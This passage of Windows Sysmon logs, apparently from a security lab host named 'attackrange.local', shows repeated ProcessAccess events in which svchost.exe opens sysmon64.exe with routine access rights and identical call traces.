C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6026,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6027,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6028,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6029,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6030,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6031,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6032,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6033,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 